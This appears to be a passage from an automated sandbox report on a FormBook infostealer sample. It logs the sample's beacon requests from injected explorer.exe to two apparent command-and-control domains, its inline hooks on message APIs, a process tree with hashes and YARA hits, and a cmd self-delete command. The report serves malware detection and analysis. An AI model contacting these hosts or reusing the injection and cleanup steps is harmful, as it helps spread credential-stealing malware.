• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.216, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.215, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.210, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.211, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.218, A (IP address), IN (0x0001)
                  • www.informacion-numero-24-h.site
                  • www.tzjisheng.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49808 | 188.114.96.10 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  May 14, 2022 13:08:49.696707010 CEST | 7579 | OUT | GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1
                  Host: www.informacion-numero-24-h.site
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:08:49.724560976 CEST | 7580 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Sat, 14 May 2022 11:08:49 GMT
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: max-age=3600
                  Expires: Sat, 14 May 2022 12:08:49 GMT
                  Location: https://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3jYpuw08wCTyYleUQgANz5%2FXm28vcSj4BwpLVOnE%2BnApx8wP1I2PlNxA8sjWRQIs%2Fbwiu%2BqJBI1neGaVXAUHTOBFP70cq8JwTnt1n%2F11%2Bw6rQ81FgayXw%2BWMDKdQyaFpmWylNMz5aZH9OSaPvxHi29l1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 70b32d9aab206937-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49810 | 154.85.152.171 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  May 14, 2022 13:09:10.304163933 CEST | 8190 | OUT | GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1
                  Host: www.tzjisheng.com
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:09:10.490811110 CEST | 8191 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Sat, 14 May 2022 11:09:10 GMT
                  Content-Type: text/html
                  Content-Length: 1780
                  Connection: close
                  Vary: Accept-Encoding
                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#26080;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;</title><meta name="keywords" content="&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#26080;&#30721;&#26080;&#38656;&#25773;&#25918;&#22120;" /><meta name="description" content="&#20037;&#20037;&#31934;&#21697;&#57;&#57;&#22269;&#20135;&#22269;&#20135;&#31934;,&#22823;&#98;&#98;&#119;&#98;&#98;&#119;&#98;&#98;&#119;&#118;&#105;&#100;&#101;&#111;&#115;,&#33609;&#34594;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#119;&#119;&#119;,&#25104;&#20154;&#97;&#118;&#2608


                  Code Manipulations

                  Function Name | Hook Type | Active in Processes
                  PeekMessageA | INLINE | explorer.exe
                  PeekMessageW | INLINE | explorer.exe
                  GetMessageW | INLINE | explorer.exe
                  GetMessageA | INLINE | explorer.exe

                  Function Name | Hook Type | New Data
                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1


                  Target ID:0
                  Start time:13:07:14
                  Start date:14/05/2022
                  Path:C:\Users\user\Desktop\inlaww321345.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\inlaww321345.exe"
                  Imagebase:0x400000
                  File size:277700 bytes
                  MD5 hash:43E64E0AB6CA479C2AF3AFED56216A91
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Target ID:1
                  Start time:13:07:15
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 46%, ReversingLabs
                  Reputation:low

                  Target ID:2
                  Start time:13:07:16
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:5
                  Start time:13:07:23
                  Start date:14/05/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6b8cf0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:16
                  Start time:13:07:49
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\chkdsk.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                  Imagebase:0x1040000
                  File size:23040 bytes
                  MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Target ID:17
                  Start time:13:07:54
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
                  Imagebase:0xc20000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:19
                  Start time:13:07:55
                  Start date:14/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c9170000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly